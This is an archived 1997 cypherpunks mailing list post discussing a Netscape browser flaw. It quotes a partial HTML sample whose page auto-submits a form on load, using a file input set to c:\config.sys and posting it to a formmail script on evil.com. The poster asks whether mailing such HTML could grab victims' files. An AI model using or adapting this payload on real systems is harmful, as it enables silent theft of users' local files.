Netscape Exploit
Anonymous
nobody at REPLAY.COM
Tue Jul 1 21:16:02 PDT 1997
> >Here is a sample it isn't complete but you get the basic idea of what is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> > NAME="daForm"
> > ACTION="http://evil.com/cgi-bin/formmail.pl"
> > METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="foobar at evil.com">
> >
> >and so on and so forth...
So if someone was using Netscape to read mail, and I included a small bit
of HTML like the above, I could snarf up files out of everywhere?
More information about the cypherpunks-legacy
mailing list